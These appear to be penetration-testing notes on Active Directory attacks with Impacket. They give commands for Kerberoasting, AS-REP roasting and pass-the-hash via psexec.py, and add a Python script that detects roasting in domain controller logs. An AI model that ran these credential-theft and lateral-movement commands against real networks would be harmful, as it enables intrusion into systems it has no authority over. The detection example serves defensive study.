Kerberoasting

Kerberoasting with Impacket

Impacket can identify kerberoastable accounts (users with an SPN set) and request their service tickets remotely, printing the TGS-REP hashes. It comes standard with Kali Linux.

GetUserSPNs.py ${DOMAIN}/${USER}:${PASSWORD} \
	-dc-ip $DOMAIN_CONTROLLER_IP -request

The hashes printed here can then be cracked with Hashcat using hash mode 13100 (Kerberos 5 TGS-REP etype 23).


AS-REP roasting

AS-REP roasting with Impacket

Impacket (via GetNPUsers.py) supports AS-REP roasting. However, GetNPUsers.py requires that user accounts already be enumerated and roastable accounts (those with pre-authentication disabled) identified.

When using GetNPUsers.py, specify the target as ${DOMAIN}/ (i.e., leave off the user-part).
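The roasting activity described in the two sections above leaves traces in the domain controller's Security log: Kerberoasting shows up as RC4 (etype 0x17) service-ticket requests in Event 4769, and AS-REP roastable accounts authenticate with Pre-Authentication Type 0 in Event 4768. The following detection logic is an added example, not part of these notes or of Impacket; the event records, field names and thresholds are constructed assumptions standing in for what a SIEM would export.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in the shape of exported 4768/4769 fields (assumed names).
EVENTS = [
    {"id": 4769, "time": "2024-01-01T10:00:00", "user": "alice@CORP.LOCAL", "service": "sqlsvc", "etype": "0x17"},
    {"id": 4769, "time": "2024-01-01T10:00:05", "user": "alice@CORP.LOCAL", "service": "httpsvc", "etype": "0x17"},
    {"id": 4769, "time": "2024-01-01T10:00:09", "user": "alice@CORP.LOCAL", "service": "backupsvc", "etype": "0x17"},
    {"id": 4769, "time": "2024-01-01T10:01:00", "user": "alice@CORP.LOCAL", "service": "krbtgt", "etype": "0x17"},  # TGT, ignored
    {"id": 4769, "time": "2024-01-01T11:00:00", "user": "bob@CORP.LOCAL", "service": "WS01$", "etype": "0x12"},  # AES, machine acct
    {"id": 4768, "time": "2024-01-01T12:00:00", "user": "svc_legacy", "preauth": "0", "etype": "0x17"},  # no pre-auth
    {"id": 4768, "time": "2024-01-01T12:00:01", "user": "carol", "preauth": "2", "etype": "0x12"},
]


def roastable_tgs(ev):
    """True for an RC4 (etype 0x17) service ticket issued for a user SPN (not krbtgt, not a machine account)."""
    if ev["id"] != 4769 or ev["etype"].lower() != "0x17":
        return False
    svc = ev.get("service", "")
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def kerberoast_suspects(events, min_services=3, window=timedelta(minutes=5)):
    """Requesting users that pulled >= min_services distinct RC4 service tickets within `window`."""
    by_user = defaultdict(list)
    for ev in events:
        if roastable_tgs(ev):
            by_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    suspects = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each request
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                suspects[user] = sorted(services)
                break
    return suspects


def asrep_roastable(events):
    """Accounts seen in 4768 with Pre-Authentication Type 0, i.e. pre-auth disabled (AS-REP roastable)."""
    return sorted({ev["user"] for ev in events if ev["id"] == 4768 and ev.get("preauth") == "0"})


if __name__ == "__main__":
    print("Kerberoast suspects:", kerberoast_suspects(EVENTS))
    print("AS-REP roastable accounts:", asrep_roastable(EVENTS))
```

Legitimate RC4 service-ticket traffic from old clients will trip the etype filter, so tune the threshold and whitelist known legacy hosts before alerting on it.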


PsExec

Impacket includes a reimplementation of PsExec. Under Linux (but not Windows) you can pass in an NTLM hash instead of a password for the target user.

# psexec.py (but ONLY on Linux; this won't work on Windows!)
# -hashes takes LMHASH:NTHASH; the LM half can be left empty.
# Target syntax is domain/user@host (a backslash would be eaten by the shell).
psexec.py -hashes :$TARGET_USER_NTLM_HASH \
    $TARGET_DOMAIN/$TARGET_USER@$TARGET_HOST